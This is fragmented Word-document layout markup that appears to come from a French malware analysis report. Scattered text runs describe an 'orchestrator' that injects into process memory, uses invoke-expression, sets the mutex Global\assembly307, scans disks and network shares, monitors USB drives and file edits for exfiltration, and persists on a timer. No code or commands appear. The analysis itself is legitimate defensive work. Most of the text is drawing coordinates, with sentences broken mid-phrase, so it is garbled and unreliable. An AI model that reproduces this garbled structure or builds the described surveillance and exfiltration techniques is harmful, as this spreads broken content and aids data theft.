            <wp:wrapNone/>
            <wp:docPr id="2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022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invoke-expression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à la toute fin du script.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7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6224928</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Cela crée une redondance : l’orchestrateur est non seulement déclenché via le processus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8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6398283</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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détaché mentionné précédemment, mais il est également injecté directement dans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9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6571638</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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mémoire du processus en cours, ce qui maximise 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les chances de réussite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de l’infection.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6763608</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4900178" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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017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L’orchestrateur initialise également un mutex nommé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Global\assembly307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1984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7609865</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2353737" cy="189848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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3737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4.4.2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Acquisition de données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3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7922283</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Une fois le déroulement de l'exécution de l'orchestrateur établi, on peut désormais analyser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4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8095638</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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les capacités d'acquisition de données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avant l'exfiltration. L'orchestrateur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5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8268993</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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fonctionne comme une plateforme de surveillance centralisée, déployant trois mécanismes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6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8442348</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="741880" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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8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simultanés.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71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812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915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017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8922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7492374</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="161290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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612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61290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90"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="16129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32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990597</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="6243320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="227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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-11" r="-11" t="-9" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="6243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6243320">
                          <a:moveTo>
                            <a:pt x="0" y="6243320"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="6243320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624332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427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529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6320" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1713865</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7210445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4170954" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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0954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15 – Fonctionnement de l’orchestrateur à des fins d’exfiltration de données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7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7463178</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4567882" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="22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788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Remarque :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lettres utilisées sont données à titre indicatif uniquement.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8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7738133</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Ces mécanismes sont conçus pour cibler les données dans trois états spécifiques :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9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7911488</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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données au repos (fichiers stockés), les données en transit (transfert physique via USB)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0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8084843</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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les données en cours d’utilisation (fichiers en cours d’édition). Pour assurer cette couverture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8258198</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3147984" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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7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complète, le code initialise trois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listeners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distincts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246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8533153</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="22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Exploration des disques de fichiers : une routine temporelle qui analyse les disques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348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8706508</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4407418" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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74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durs locaux et les partages réseau à la recherche de fichiers statiques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451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8879863</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Surveillance des clés USB : un</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="1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listener</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="16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d’événements matériels ciblant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553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9053218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="22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spécifiquement les périphériques de stockage USB afin d’intercepter les transferts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656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9226573</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1472232" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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722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physiques de données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758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860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96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065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926016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2958474</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="1371599"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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1371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1371599">
                          <a:moveTo>
                            <a:pt x="0" y="1205230"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="1205230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="1371599"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1371599"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1205230"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="1057910"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1057910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1205230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1205230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1057910"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="763270"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="763270"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1057910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1057910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="763270"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="468630"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="468630"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="763270"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="763270"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="468630"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="321309"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="321309"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="468630"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="468630"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="321309"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="173989"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="173989"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="321309"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="321309"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="173989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73989"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="173989"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1205230"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="1205230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="1371599"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1371599"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1205230"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="1057910"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1057910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1205230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1205230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1057910"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="763270"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="763270"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="1057910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="1057910"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="763270"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="468630"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="468630"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="763270"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="763270"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="468630"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="321309"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="321309"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="468630"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="468630"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="321309"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="173989"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="173989"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="321309"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="321309"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="173989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73989"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1739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3360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2959109</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5874384" cy="1370965"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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13709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1370965">
                          <a:moveTo>
                            <a:pt x="3174" y="1370965"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="1205230"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="1367790"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="1367790"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="1367790"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="1367790"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="1205230"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1370965"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="1205230"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="1057910"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="1057910"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1205230"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="1057910"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="763270"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="763270"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1057910"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="763270"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="468630"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="468630"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="763270"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="468630"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="321310"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="321310"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="468630"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="321310"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="173990"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="173990"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="321310"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="173990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173990"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="1370965"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="1205230"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="1205230"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1370965"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="1205230"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="1057910"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="1057910"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1205230"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="1057910"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="763270"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="763270"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1057910"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="763270"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="468630"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="468630"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="763270"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="468630"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="321310"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="321310"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="468630"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="321310"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="173990"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="173990"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="321310"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="173990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173990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5408" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2491105</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2256799</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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7456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2256799</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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5648" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2660650</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2472699</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1461770" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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177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1770" h="199390">
                          <a:moveTo>
                            <a:pt x="1097914" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1097914" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1461134" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1461134" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1097279" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1461770" y="634"/>
                          </a:lnTo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772794" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="772794" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="77342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7696" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2776855</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4765049</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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79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4765049</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2736850" cy="731520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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850" cy="731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6850" h="731520">
                          <a:moveTo>
                            <a:pt x="843915" y="731520"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="843915" y="532130"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2435225" y="532130"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2435225" y="731520"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="843280" y="532765"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2435859" y="532765"/>
                          </a:lnTo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2736215" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2736215" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2736850" y="21526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2032" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6297295</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6480819</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="363223" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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22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21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363219" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="36321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0464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6695449</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3265169" cy="976629"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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5169" cy="9766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5169" h="976629">
                          <a:moveTo>
                            <a:pt x="3264535" y="777239"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3264535" y="976629"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2082800" y="777874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3265169" y="777874"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1106805" y="976629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1106805" y="777239"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1797685" y="777239"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1797685" y="976629"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1106170" y="777874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1798319" y="777874"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="976629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="777239"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1017905" y="777239"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1017905" y="976629"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="777874"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1018540" y="777874"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="761999"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="562609"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="691514" y="562609"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="691514" y="761999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428115" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1428115" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="142875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2512" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3433445</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7472689</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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4800" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4685030</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7472689</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1976119" cy="415290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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6119" cy="4152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76119" h="415290">
                          <a:moveTo>
                            <a:pt x="1776094" y="415290"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1776094" y="215900"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1975484" y="215900"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1975484" y="415290"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1775459" y="216535"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1976119" y="216535"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="634" y="415290"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="634" y="215900"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="772794" y="215900"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="772794" y="415290"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="216535"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="773430" y="216535"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="18415" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="18415" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="708025" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="708025" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="17779" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="70866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8896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7903219</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1182370" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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37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237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181735" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="1181735" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="118237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0944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8743959</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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7088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8743959</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2367279" cy="414020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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7279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67279" h="414020"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2366645" y="214629"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2366645" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2367279" y="215265"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2212975" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="221297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811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3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913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016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960778</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Surveillance des fichiers en temps réel : un observateur actif qui surveille les disques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118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1134133</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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durs à la recherche de toute activité immédiate de l’utilisateur, telle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220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1307488</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3147794" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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77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l’enregistrement ou la modification d’un document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3232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1564665</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3105602" cy="189848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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5602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</w:rPr>
                          <w:t xml:space="preserve">4.4.3 Exploration du lecteur de fichiers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4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1877083</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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L'orchestrateur met en place un mécanisme de persistance temporelle conçu pour exécuter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5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2050438</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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  <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve">une charge</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="110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2"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> utile sp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écifique à intervalles</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="10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 réguliers. Il initialise</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
